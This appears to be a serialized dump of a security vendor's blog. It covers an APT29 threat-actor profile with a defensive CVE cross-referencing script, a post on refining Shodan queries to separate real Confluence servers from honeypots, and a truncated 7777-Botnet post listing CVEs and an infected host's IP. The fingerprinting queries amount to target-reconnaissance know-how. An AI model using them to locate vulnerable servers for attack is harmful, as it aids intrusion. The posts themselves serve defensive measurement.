",[1373,80745,183],{"class":9173},[1373,80747,9062],{"class":1383},[1373,80749,80750,80752,80755,80757,80759],{"class":1375,"line":4806},[1373,80751,19050],{"class":9152},[1373,80753,80754],{"class":9155},"techniques",[1373,80756,183],{"class":9152},[1373,80758,4606],{"class":1383},[1373,80760,26352],{"class":1383},[1373,80762,80763],{"class":1375,"line":4817},[1373,80764,80765],{"class":1383},"      {\n",[1373,80767,80768,80770,80773,80775,80777,80779,80782,80784],{"class":1375,"line":4825},[1373,80769,28414],{"class":9152},[1373,80771,80772],{"class":9165},"technique_id",[1373,80774,183],{"class":9152},[1373,80776,4606],{"class":1383},[1373,80778,4883],{"class":9173},[1373,80780,80781],{"class":9176},"T1001",[1373,80783,183],{"class":9173},[1373,80785,9062],{"class":1383},[1373,80787,80788,80790,80793,80795,80797,80799,80802,80804],{"class":1375,"line":4835},[1373,80789,28414],{"class":9152},[1373,80791,80792],{"class":9165},"technique_name",[1373,80794,183],{"class":9152},[1373,80796,4606],{"class":1383},[1373,80798,4883],{"class":9173},[1373,80800,80801],{"class":9176},"Data 
Obfuscation",[1373,80803,183],{"class":9173},[1373,80805,9062],{"class":1383},[1373,80807,80808,80810,80813,80815,80817,80819,80822,80824],{"class":1375,"line":4843},[1373,80809,28414],{"class":9152},[1373,80811,80812],{"class":9165},"sub_technique",[1373,80814,183],{"class":9152},[1373,80816,4606],{"class":1383},[1373,80818,4883],{"class":9173},[1373,80820,80821],{"class":9176},"002",[1373,80823,183],{"class":9173},[1373,80825,9062],{"class":1383},[1373,80827,80828,80830,80833,80835,80837,80839,80842,80844],{"class":1375,"line":4849},[1373,80829,28414],{"class":9152},[1373,80831,80832],{"class":9165},"sub_technique_name",[1373,80834,183],{"class":9152},[1373,80836,4606],{"class":1383},[1373,80838,4883],{"class":9173},[1373,80840,80841],{"class":9176},"Steganography",[1373,80843,183],{"class":9173},[1373,80845,9062],{"class":1383},[1373,80847,80848,80850,80853,80855,80857],{"class":1375,"line":4877},[1373,80849,28414],{"class":9152},[1373,80851,80852],{"class":9165},"tactic",[1373,80854,183],{"class":9152},[1373,80856,4606],{"class":1383},[1373,80858,26352],{"class":1383},[1373,80860,80861,80863,80866],{"class":1375,"line":4915},[1373,80862,28875],{"class":9173},[1373,80864,80865],{"class":9176},"command-and-control",[1373,80867,19057],{"class":9173},[1373,80869,80870],{"class":1375,"line":4931},[1373,80871,80872],{"class":1383},"        
]\n",[1373,80874,80875],{"class":1375,"line":4947},[1373,80876,28468],{"class":1383},[1373,80878,80879],{"class":1375,"line":4952},[1373,80880,80765],{"class":1383},[1373,80882,80883,80885,80887,80889,80891,80893,80896,80898],{"class":1375,"line":6776},[1373,80884,28414],{"class":9152},[1373,80886,80772],{"class":9165},[1373,80888,183],{"class":9152},[1373,80890,4606],{"class":1383},[1373,80892,4883],{"class":9173},[1373,80894,80895],{"class":9176},"T1027",[1373,80897,183],{"class":9173},[1373,80899,9062],{"class":1383},[1373,80901,80902,80904,80906,80908,80910,80912,80915,80917],{"class":1375,"line":6781},[1373,80903,28414],{"class":9152},[1373,80905,80792],{"class":9165},[1373,80907,183],{"class":9152},[1373,80909,4606],{"class":1383},[1373,80911,4883],{"class":9173},[1373,80913,80914],{"class":9176},"Obfuscated Files or Information",[1373,80916,183],{"class":9173},[1373,80918,9062],{"class":1383},[1373,80920,80921,80923,80925,80927,80929],{"class":1375,"line":7524},[1373,80922,28414],{"class":9152},[1373,80924,80852],{"class":9165},[1373,80926,183],{"class":9152},[1373,80928,4606],{"class":1383},[1373,80930,26352],{"class":1383},[1373,80932,80933,80935,80938],{"class":1375,"line":7530},[1373,80934,28875],{"class":9173},[1373,80936,80937],{"class":9176},"defense-evasion",[1373,80939,19057],{"class":9173},[1373,80941,80942],{"class":1375,"line":7546},[1373,80943,80872],{"class":1383},[1373,80945,80946],{"class":1375,"line":7571},[1373,80947,28468],{"class":1383},[1373,80949,80950],{"class":1375,"line":7598},[1373,80951,80765],{"class":1383},[1373,80953,80954,80956,80958,80960,80962,80964,80966,80968],{"class":1375,"line":7615},[1373,80955,28414],{"class":9152},[1373,80957,80772],{"class":9165},[1373,80959,183],{"class":9152},[1373,80961,4606],{"class":1383},[1373,80963,4883],{"class":9173},[1373,80965,80895],{"class":9176},[1373,80967,183],{"class":9173},[1373,80969,9062],{"class":1383},[1373,80971,80972,80974,80976,80978,80980,80982,80984,80986],{"class":1375,"lin
e":7635},[1373,80973,28414],{"class":9152},[1373,80975,80792],{"class":9165},[1373,80977,183],{"class":9152},[1373,80979,4606],{"class":1383},[1373,80981,4883],{"class":9173},[1373,80983,80914],{"class":9176},[1373,80985,183],{"class":9173},[1373,80987,9062],{"class":1383},[1373,80989,80990,80992,80994,80996,80998,81000,81002,81004],{"class":1375,"line":7640},[1373,80991,28414],{"class":9152},[1373,80993,80812],{"class":9165},[1373,80995,183],{"class":9152},[1373,80997,4606],{"class":1383},[1373,80999,4883],{"class":9173},[1373,81001,80821],{"class":9176},[1373,81003,183],{"class":9173},[1373,81005,9062],{"class":1383},[1373,81007,81008,81010,81012,81014,81016,81018,81021,81023],{"class":1375,"line":7648},[1373,81009,28414],{"class":9152},[1373,81011,80832],{"class":9165},[1373,81013,183],{"class":9152},[1373,81015,4606],{"class":1383},[1373,81017,4883],{"class":9173},[1373,81019,81020],{"class":9176},"Software Packing",[1373,81022,183],{"class":9173},[1373,81024,9062],{"class":1383},[1373,81026,81027,81029,81031,81033,81035],{"class":1375,"line":7672},[1373,81028,28414],{"class":9152},[1373,81030,80852],{"class":9165},[1373,81032,183],{"class":9152},[1373,81034,4606],{"class":1383},[1373,81036,26352],{"class":1383},[1373,81038,81039,81041,81043],{"class":1375,"line":7688},[1373,81040,28875],{"class":9173},[1373,81042,80937],{"class":9176},[1373,81044,19057],{"class":9173},[1373,81046,81047],{"class":1375,"line":7709},[1373,81048,80872],{"class":1383},[61,81050,81052],{"id":81051},"expanding-vendors-products","Expanding Vendors \u002F Products",[18,81054,81055],{},"Lastly, we will pull the vendors and products associated with the CVEs we learned about to create a colorful data visualization that will catch the attention of any CISO \u002F Board. 
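The two sections above show the profile's `cve_references` and `mitre_attack_group.techniques` objects but not how a team would actually use them. Here is an added example (not code from the post or from VulnCheck) that does the two things the text describes: cross-references the actor's evidence-backed CVEs against a scanner export, and rolls the ATT&CK techniques up by tactic in the `T1027.002` form a SOC would search on. The profile fragment reuses only the field names and values shown on this page; the scan findings and the function names (`actor_cves`, `exposed_assets`, `techniques_by_tactic`) are constructed for illustration.

```python
"""Cross-reference a threat actor profile against scan data and ATT&CK.

Added example, not code from the original post. PROFILE_JSON is built from
the fields shown on the page (cve_references, mitre_attack_group.techniques);
SCAN_FINDINGS is a made-up scanner export used only to exercise the code.
"""
import json
from collections import defaultdict

# Constructed profile fragment using the page's field names and values.
PROFILE_JSON = """
{
  "cve_references": [
    {"url": "https://www.recordedfuture.com/russian-apt-toolkits",
     "date_added": "2016-08-04",
     "cve": ["cve-2010-0232", "cve-2010-4398", "cve-2013-0640", "cve-2013-0641"]},
    {"url": "https://media.defense.gov/2020/jul/16/2002457639/-1/-1/0/ncsc_apt29_advisory-quad-official-20200709-1810.pdf",
     "date_added": "2020-07-16",
     "cve": ["cve-2018-13379", "cve-2019-9670", "cve-2019-11510", "cve-2019-19781"]}
  ],
  "mitre_attack_group": {
    "name": "APT29",
    "techniques": [
      {"technique_id": "T1001", "technique_name": "Data Obfuscation",
       "sub_technique": "002", "sub_technique_name": "Steganography",
       "tactic": ["command-and-control"]},
      {"technique_id": "T1027", "technique_name": "Obfuscated Files or Information",
       "tactic": ["defense-evasion"]},
      {"technique_id": "T1027", "technique_name": "Obfuscated Files or Information",
       "sub_technique": "002", "sub_technique_name": "Software Packing",
       "tactic": ["defense-evasion"]}
    ]
  }
}
"""

# Constructed scanner export as (asset, CVE) rows. IDs arrive in mixed case,
# as they do from real tools, so the lookup must normalise them.
SCAN_FINDINGS = [
    ("vpn-gw-01", "CVE-2018-13379"),
    ("vpn-gw-02", "CVE-2019-11510"),
    ("web-01", "CVE-2021-44228"),   # not tied to this actor in the profile
    ("mail-01", "cve-2019-9670"),
]


def load_profile():
    """Parse the embedded profile fragment into a dict."""
    return json.loads(PROFILE_JSON)


def actor_cves(profile):
    """Map each CVE (upper-cased) to the (url, date_added) sources citing it."""
    evidence = defaultdict(list)
    for ref in profile.get("cve_references", []):
        for cve in ref.get("cve", []):
            evidence[cve.upper()].append((ref["url"], ref["date_added"]))
    return dict(evidence)


def exposed_assets(profile, findings):
    """Return {CVE: {asset, ...}} for scan findings that match actor CVEs."""
    evidence = actor_cves(profile)
    hits = defaultdict(set)
    for asset, cve in findings:
        key = cve.upper()
        if key in evidence:
            hits[key].add(asset)
    return dict(hits)


def techniques_by_tactic(profile):
    """Group full ATT&CK IDs (T1027.002 form) under each tactic, deduplicated."""
    grouped = defaultdict(set)
    for t in profile["mitre_attack_group"].get("techniques", []):
        tid = t["technique_id"]
        if t.get("sub_technique"):
            tid = f"{tid}.{t['sub_technique']}"
        for tactic in t.get("tactic", []):
            grouped[tactic].add(tid)
    return {tactic: sorted(ids) for tactic, ids in grouped.items()}


if __name__ == "__main__":
    profile = load_profile()
    evidence = actor_cves(profile)
    for cve, assets in sorted(exposed_assets(profile, SCAN_FINDINGS).items()):
        sources = ", ".join(url for url, _ in evidence[cve])
        print(f"{cve}: {sorted(assets)}  evidence: {sources}")
    for tactic, ids in sorted(techniques_by_tactic(profile).items()):
        print(f"{tactic}: {ids}")
```

The upper-casing is deliberate: the profile stores IDs as `cve-2018-13379` while most scanners emit `CVE-2018-13379`, and a case-sensitive join silently drops every match. Keeping the source URL and `date_added` next to each hit is what makes the result defensible when the vulnerability management team is asked why those assets jumped the queue.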
And that completes the threat actor profile… for now!",[18,81057,81058],{},[68,81059],{":width":10862,"alt":79444,"src":79445},[61,81061,81063],{"id":81062},"a-new-view-into-threat-actors","A New View into Threat Actors",[18,81065,81066],{},"We’ve gracefully been able to shift the threat actor narrative here from a fear-driven approach associated with threat actors to one that orients around data rather than fictional characters. In the future, I would like to expand on this example profile with additional context pivoting across other data sources associated with vulnerabilities and suspected victims. We can learn about the threat actors from the treasure trove of data I’ve discovered since starting at VulnCheck. It also fits perfectly into a PowerPoint slide deck to share at your next leadership meeting.",[61,81068,202],{"id":201},[18,81070,73826,81071,217],{},[47,81072,216],{"href":214,"rel":81073},[51],[2901,81075,81076],{},"html pre.shiki code .siCPE, html code.shiki .siCPE{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sLACW, html code.shiki .sLACW{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .ss--_, html code.shiki .ss--_{--shiki-light:#90A4AE;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .swvn1, html code.shiki .swvn1{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .saDeg, html code.shiki .saDeg{--shiki-light:#39ADB5;--shiki-light-font-style:inherit;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sEff5, html code.shiki 
.sEff5{--shiki-light:#9C3EDA;--shiki-light-font-style:inherit;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sh1VR, html code.shiki .sh1VR{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#CFCFC2}html pre.shiki code .sINAO, html code.shiki .sINAO{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#CFCFC2}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: 
var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html pre.shiki code .s_MOj, html code.shiki .s_MOj{--shiki-light:#E2931D;--shiki-light-font-style:inherit;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}",{"title":219,"searchDepth":220,"depth":220,"links":81078},[81079,81080,81081,81082,81083,81084,81085],{"id":79460,"depth":220,"text":79461},{"id":79699,"depth":220,"text":79700},{"id":80376,"depth":220,"text":80377},{"id":80613,"depth":220,"text":80614},{"id":81051,"depth":220,"text":81052},{"id":81062,"depth":220,"text":81063},{"id":201,"depth":220,"text":202},"2024-02-15",{"slug":81088},"how-we-think-about-threat-actors","\u002Fblog\u002Fhow-we-think-about-threat-actors",{"title":79426,"description":79448},"blog\u002Fhow-we-think-about-threat-actors",[1280],"rjFj8rJWt1Hpy6g1Hv_4CJBjvo8HI_OZkAvHjz1dyeg",{"id":81095,"title":58291,"articles":81096,"authors":81126,"body":81128,"date":81101,"description":81327,"extension":234,"image":7,"link":7,"meta":81328,"navigation":237,"path":81329,"seo":81330,"series":7,"stem":81331,"subtype":7,"tags":81332,"__hash__":81333},"blog\u002Fblog\u002Ftoo-many-honeypots.md",[81097,81102,81106,81110,81114,81119,81122],{"title":81098,"source":81099,"link":81100,"date":81101},"Report finds excessive honeypots are spoiling cybersecurity data accuracy","SiliconANGLE","https:\u002F\u002Fsiliconangle.com\u002F2024\u002F02\u002F02\u002Freport-finds-excessive-honeypots-spoiling-cybersecurity-data-accuracy\u002F","2024-02-02",{"title":81103,"source":61436,"link":81104,"date":81105},"Risky Biz News: Two Iranian cyber groups get doxed in a 
week","https:\u002F\u002Friskybiznews.substack.com\u002Fp\u002Ftwo-iranian-cyber-groups-doxed-in-a-week?utm_source=post-email-title&publication_id=852612&post_id=141371768&utm_campaign=email-post-title&isFreemail=true&r=2rnh0k&utm_medium=email","2024-02-05",{"title":81107,"source":11233,"link":81108,"date":81109},"Overabundant honeypots present cyber data accuracy challenges","https:\u002F\u002Fwww.scmagazine.com\u002Fbrief\u002Foverabundant-honeypots-present-cyber-data-accuracy-challenges","2024-02-06",{"title":81111,"source":63100,"link":81112,"date":81113},"Shim Shady and Algorithm Lovers – PSW #816","https:\u002F\u002Fwww.scmagazine.com\u002Fpodcast-segment\u002F12481-shim-shady-and-algorithm-lovers-psw-816","2024-02-07",{"title":81115,"source":81116,"link":81117,"date":81118},"THIS WEEK IN SECURITY: BROKEN SHIMS, LASSPASS, AND TOOTHBRUSHES?","Hackaday","https:\u002F\u002Fhackaday.com\u002F2024\u002F02\u002F09\u002Fthis-week-in-security-broken-shims-lasspass-and-toothbrushes\u002F","2024-02-09",{"title":81120,"source":14378,"link":81121,"date":81118},"In Other News: $350 Million Google Settlement, AI-Powered Fraud, Cybersecurity Funding","https:\u002F\u002Fwww.securityweek.com\u002Fin-other-news-350-million-google-settlement-ai-powered-fraud-cybersecurity-funding\u002F",{"title":81123,"source":14378,"link":81124,"date":81125},"Recent Zero-Day Could Impact Up to 97,000 Microsoft Exchange 
Servers","https:\u002F\u002Fwww.securityweek.com\u002Frecent-zero-day-could-impact-up-to-97000-microsoft-exchange-servers\u002F","2024-02-20",[81127],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":81129,"toc":81323},[81130,81136,81139,81142,81160,81166,81169,81175,81189,81192,81199,81204,81207,81213,81216,81222,81229,81235,81241,81247,81254,81260,81273,81279,81282,81288,81291,81297,81300,81306,81308,81315,81318,81320],[43656,81131,81133],{"author":3481,"link":81132},"https:\u002F\u002Fwww.theregister.com\u002F2023\u002F11\u002F08\u002Fatlassian_confluence_flaw_upgraded\u002F",[18,81134,81135],{},"According to Huntress Labs, a Shodan search for \"Confluence\" returns more than 200,000 results, and searches for the Confluence favicon return more than 5,000. These figures aren't an indication of the number of vulnerable instances, but do show how many are exposed to the internet.",[263,81137],{":list":81138,"ico":266,"title":58291},"[\"At the time of publication, there’s more than 235,000 internet-facing Confluence honeypots.\",\"There’s, at most, 4,000 real internet-facing Confluence servers.\",\"Filtering ~240,000 potential Confluence servers down to 4,000 hosts is not trivial but is important for understanding the potential impact of Confluence vulnerabilities.\"]",[18,81140,81141],{},"Determining the number of internet-facing hosts affected by a new vulnerability is a key factor in determining if it will become a widespread or emergent threat. Are there a lot of hosts affected? Pretty good possibility things are about to pop off. Only a few hosts? Probably less likely. But actually, counting those hosts has become quite a bit more challenging.",[18,81143,81144,81145,81149,81150,81153,81154,81159],{},"Take for example, ",[47,81146,22217],{"href":81147,"rel":81148},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2023-22527",[51]," affecting Atlassian Confluence. 
At the time of writing, Confluence has appeared on the CISA KEV list nine (yes, ",[295,81151,81152],{},"nine",") times. That’s a level of exploitation that should encourage everyone to get their Confluence servers off the internet. But let’s look for ourselves. There are a number of generic Confluence Shodan queries floating around, but ",[47,81155,81158],{"href":81156,"rel":81157},"https:\u002F\u002Fpentest-tools.com\u002Fblog\u002Fdetect-exploit-cve-2021-26084-confluence-server-rce#using-shodan",[51],"X-Confluence-Request-Time"," might be the most well known (this simply checks for an HTTP response header value):",[18,81161,81162],{},[68,81163],{":width":10862,"alt":81164,"src":81165},"X-Confluence-Request-Time Shodan Query","\u002Fblog\u002Ftoo-many-honeypots\u002Fx-confluence-request-time.png",[18,81167,81168],{},"241,000 hosts is a great target base for an emergent threat! But, on closer examination, there’s something off about the listed hosts. For example, this one has the Confluence “X-Confluence-Request-Time” header:",[18,81170,81171],{},[68,81172],{":width":10862,"alt":81173,"src":81174},"A honeypot pretending to be F5, Confluence, and QNAP","\u002Fblog\u002Ftoo-many-honeypots\u002Ff5-confluence-qnap.png",[18,81176,81177,81178,1255,81183,81188],{},"But it also has an F5 favicon, and it also claims to be a QNAP TS-128A. This is a honeypot. Whoever created this honeypot was somewhat clever. 
They mashed together the popular Shodan queries for Confluence, ",[47,81179,81182],{"href":81180,"rel":81181},"https:\u002F\u002Fwww.shodan.io\u002Fsearch?query=http.favicon.hash%3A-335242539",[51],"F5 devices",[47,81184,81187],{"href":81185,"rel":81186},"https:\u002F\u002Fwww.shodan.io\u002Fsearch?query=http.html_hash%3A-558771039",[51],"QNAP systems",", to create an abomination that would show up in all three queries.",[18,81190,81191],{},"To avoid throwing exploits all over the internet (and thus getting quickly caught), some attackers use Shodan (or similar) to curate target lists. This honeypot is optimized for this use case. Which is neat, but blocks our view of what is real. Can we filter them out of our search?",[18,81193,81194,81195,81198],{},"In a ",[47,81196,11046],{"href":74268,"rel":81197},[51]," about CVE-2023-22527, Project Discovery provides this Shodan query in a Nuclei template:",[1925,81200,81201],{},[18,81202,81203],{},"http.component:\"Atlassian Confluence\"",[18,81205,81206],{},"The result is significantly better than the “X-Confluence-Request-Time” query, but you can still see the 2nd and 3rd results are honeypots. 
So that won’t do.",[18,81208,81209],{},[68,81210],{":width":10862,"alt":81211,"src":81212},"Nuclei query","\u002Fblog\u002Ftoo-many-honeypots\u002Fnuclei.png",[18,81214,81215],{},"At this point, it’s probably useful to look at what a real Confluence server HTTP response looks like (this is actually after a 302 redirect, but let’s avoid that discussion):",[1354,81217,81220],{"className":81218,"code":81219,"language":1359,"meta":219},[1357],"HTTP\u002F1.1 200\nCache-Control: no-store\nExpires: Thu, 01 Jan 1970 00:00:00 GMT\nX-Confluence-Request-Time: 1696956993845\nSet-Cookie: JSESSIONID=72D881CD92E61BE1394BB6231C28A68B; Path=\u002F; HttpOnly\nX-XSS-Protection: 1; mode=block\nX-Content-Type-Options: nosniff\nX-Frame-Options: SAMEORIGIN\nContent-Security-Policy: frame-ancestors 'self'\nX-Accel-Buffering: no\nContent-Encoding: gzip\nVary: User-Agent\nContent-Type: text\u002Fhtml;charset=UTF-8\nContent-Language: en-US\nTransfer-Encoding: chunked\nDate: Tue, 10 Oct 2023 16:56:33 GMT\n",[886,81221,81219],{"__ignoreMap":219},[18,81223,81224,81225,81228],{},"The server has a number of useful headers to key off of, but we’ll try to filter by adding in ",[886,81226,81227],{},"Set-Cookie: JSESSIONID=",". That update brings the host count down to nearly half of the Nuclei query.",[18,81230,81231],{},[68,81232],{":width":10862,"alt":81233,"src":81234},"Filter using JSESSIONID","\u002Fblog\u002Ftoo-many-honeypots\u002Fjsessionid.png",[18,81236,81237,81238,4606],{},"But still, there are so many honeypots! Almost all of which aren’t responding with an actual Confluence landing page. 
A simple way we can capitalize on that is to include a snippet from the Confluence login page in our query: ",[886,81239,81240],{},"html:\"confluence-base-url\"",[18,81242,81243],{},[68,81244],{":width":10862,"alt":81245,"src":81246},"Filter using confluence-base-url","\u002Fblog\u002Ftoo-many-honeypots\u002Fbaseurl.png",[18,81248,81249,81250,81253],{},"That does knock off ~17,000 hosts, and things are looking more ",[1131,81251,81252],{},"Confluency",". But there seems to be a whole bunch of entries without favicons. Let’s drill down into one and see…",[18,81255,81256],{},[68,81257],{":width":10862,"alt":81258,"src":81259},"Another damn honeypot","\u002Fblog\u002Ftoo-many-honeypots\u002Fits-a-honeypot.png",[18,81261,81262,81263,1246,81266,1255,81269,81272],{},"It’s a honeypot. This one is really well done. It looks just like a standard Confluence install, except it produces 302 redirects on the ",[886,81264,81265],{},".css",[886,81267,81268],{},".js",[886,81270,81271],{},"favicon"," requests.",[18,81274,81275],{},[68,81276],{":width":10862,"alt":81277,"src":81278},"Honeypot fail #1","\u002Fblog\u002Ftoo-many-honeypots\u002Fredirects.png",[18,81280,81281],{},"Unfortunately, Shodan doesn’t provide a good way to filter out hosts without favicon. Additionally, filtering on a known favicon is a non-starter because users can upload their own. So we have to find some other discrepancies in these honeypots in order to filter them out. Lucky for us, they have a few mistakes, but highlighted here is the most obvious:",[18,81283,81284],{},[68,81285],{":width":10862,"alt":81286,"src":81287},"Honeypot fail #2","\u002Fblog\u002Ftoo-many-honeypots\u002Freused-session.png",[18,81289,81290],{},"They all use the exact same JSESSIONID. 
Filter all those out, and we have the following:",[18,81292,81293],{},[68,81294],{":width":10862,"alt":81295,"src":81296},"The final Shodan query","\u002Fblog\u002Ftoo-many-honeypots\u002Ffinal.png",[18,81298,81299],{},"A quick investigation suggests that this could be the complete set of real Confluence hosts (or just very very good honeypots). That’s a reduction from 240,000 hosts all the way down to just 4,200. That means there are approximately 236,000 Confluence honeypots on the internet or more than 50 times the actual number of real Confluence servers.",[18,81301,81302],{},[68,81303],{":width":10862,"alt":81304,"src":81305},"Filtering for Confluence","\u002Fblog\u002Ftoo-many-honeypots\u002Fconfluence-servers-shodan.png",[61,81307,1903],{"id":1902},[18,81309,81310,81311,81314],{},"A vulnerability that only impacts 4,000 hosts is much less concerning than a vulnerability that impacts 240,000. Understanding the scale of an issue is important, and therefore, being precise about the number of potentially impacted hosts is important too. Those who copy overinflated statistics or haven’t done their due diligence are making vulnerabilities appear ",[295,81312,81313],{},"more"," impactful than they truly are.",[18,81316,81317],{},"While we focused on Confluence, this particular problem has been repeated across many different targets. Honeypots are a net good for the security community. But their expanding popularity does make understanding real-world attack surfaces much more difficult for defenders, not just attackers.",[61,81319,202],{"id":201},[18,81321,81322],{},"VulnCheck continuously monitors the internet for high-impact vulnerabilities and tracks the potential internet-facing attack surface. We pride ourselves on providing accurate and actionable information. All signal, no noise. 
To demo our data, create an account and request a trial today.",{"title":219,"searchDepth":220,"depth":220,"links":81324},[81325,81326],{"id":1902,"depth":220,"text":1903},{"id":201,"depth":220,"text":202},"VulnCheck faces a horde of honeypots while assessing the potential impact of Atlassian Confluence's CVE-2023-22527. This blog delves into Shodan queries to filter out honeypots and uncover the actual on-premise Confluence install base.",{},"\u002Fblog\u002Ftoo-many-honeypots",{"title":58291,"description":81327},"blog\u002Ftoo-many-honeypots",[23275],"G7B167qESzJTAgtdOWZ5UP8yTM3Qk-aOcTONCTi0c4Y",{"id":81335,"title":58279,"articles":81336,"authors":81343,"body":81345,"date":82166,"description":82167,"extension":234,"image":7,"link":7,"meta":82168,"navigation":237,"path":82170,"seo":82171,"series":7,"stem":82172,"subtype":7,"tags":82173,"__hash__":82174},"blog\u002Fblog\u002Fip-intel-7777-botnet.md",[81337,81340],{"title":81338,"source":23286,"link":81339,"date":68288},"Botnet 7777: Are You Betting on a Compromised Router?","https:\u002F\u002Fsecurityboulevard.com\u002F2024\u002F08\u002Fbotnet-7777-are-you-betting-on-a-compromised-router\u002F",{"title":81341,"source":14382,"link":81342,"date":64874},"Quad7 Botnet Expands to Target SOHO Routers and VPN Appliances","https:\u002F\u002Fthehackernews.com\u002F2024\u002F09\u002Fquad7-botnet-expands-to-target-soho.html",[81344],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":81346,"toc":82156},[81347,81350,81352,81378,81384,81388,81391,81916,81923,81929,81962,81979,81983,81991,81997,82036,82042,82045,82049,82078,82084,82087,82093,82110,82119,82123,82126,82129,82135,82138,82140,82143,82146,82150,82153],[263,81348],{":list":81349,"ico":266,"title":58279},"[\"7777-Botnet remains active, and VulnCheck used co-located services to theorize the botnet is infecting TP-Link, Xiongmai, and Hikvision devices using CVE-2017-7577, CVE-2018-10088, CVE-2022-45460, CVE-2021-36260, and\u002For 
CVE-2022-24355.\",\"The botnet also appears to infect other systems like MVPower, Zyxel NAS, and GitLab, although at a very low volume.\",\"The botnet doesn’t just start a service on port 7777. It also spins up a SOCKS5 server on port 11228.\"]",[61,81351,11648],{"id":11647},[18,81353,81354,81355,81362,81363,982,81368,81373,81374,59],{},"In October 2023, the 7777-Botnet was first discussed in a writeup titled, ",[1131,81356,81357],{},[47,81358,81361],{"href":81359,"rel":81360},"https:\u002F\u002Fgi7w0rm.medium.com\u002Fthe-curious-case-of-the-7777-botnet-86e3464c3ffd",[51],"The Curious Case of the 7777-Botnet",". The author, supported by other researchers, describes a ~10,000-node botnet whose purpose is to brute-force Microsoft Azure user credentials. It employs targeted, low-volume methods that are so effective that they were only discovered due to a geolocation login anomaly. The botnet’s targets include VIP users from organizations within the United States and Europe. Additionally, the writeup details loose links to the well-known threat actors ",[47,81364,81367],{"href":81365,"rel":81366},"https:\u002F\u002Fmalpedia.caad.fkie.fraunhofer.de\u002Factor\u002Fscattered_spider",[51],"Scattered Spider",[47,81369,81372],{"href":81370,"rel":81371},"https:\u002F\u002Fmalpedia.caad.fkie.fraunhofer.de\u002Factor\u002Flazarus_group",[51],"Lazarus",", based on reports from CrowdStrike and ReversingLabs respectively. The botnet, which has a fairly distinct signature, remains ",[47,81375,5550],{"href":81376,"rel":81377},"https:\u002F\u002Ftrends.shodan.io\u002Fsearch?query=hash:1357418825%20port:7777#facet\u002Foverview",[51],[18,81379,81380],{},[68,81381],{":width":10862,"alt":81382,"src":81383},"7777-Botnet Trending on Shodan","\u002Fblog\u002Fip-intel-7777-botnet\u002F7777-botnet-trending.png",[61,81385,81387],{"id":81386},"xiongmai-infections","Xiongmai Infections",[18,81389,81390],{},"However, little is known about how the botnet infects new hosts. 
Looking through our IP intelligence data, we can see it co-located with software with known vulnerabilities. This can give us a good idea of the potential vulnerabilities that the botnet is using to infect new nodes. Take, for example, this 7777-Botnet installation on a Xiongmai device detailed in our IP-intelligence dataset:",[1354,81392,81394],{"className":22307,"code":81393,"language":22309,"meta":219,"style":219},"{\"ip\":\"1.34.97.9\",\"port\":7777,\"ssl\":false,\"lastSeen\":\"2024-01-15T13:08:10.811693\",\"asn\":\"AS3462\",\"country\":\"Taiwan\",\"country_code\":\"TW\",\"city\":\"Hsinchu\",\"cve\":[],\"matches\":[\"7777Botnet\"],\"hostnames\":[\"1-34-97-9.hinet-ip.hinet.net\"],\"type\":{\"id\":\"c2\",\"finding\":\"command and control infrastructure\"},\"feed_ids\":[\"e738e65a-6e88-4ad3-a922-55d32e57d4e7\"]}\n{\"ip\":\"1.34.97.9\",\"port\":81,\"ssl\":false,\"lastSeen\":\"2024-01-14T15:33:16.045105\",\"asn\":\"AS3462\",\"country\":\"Taiwan\",\"country_code\":\"TW\",\"city\":\"Hsinchu\",\"cve\":[\"CVE-2017-7577\",\"CVE-2018-10088\",\"CVE-2022-45460\"],\"matches\":[\"Xiongmai Path Traversal Credential Leak\",\"Xiongmai Authentication 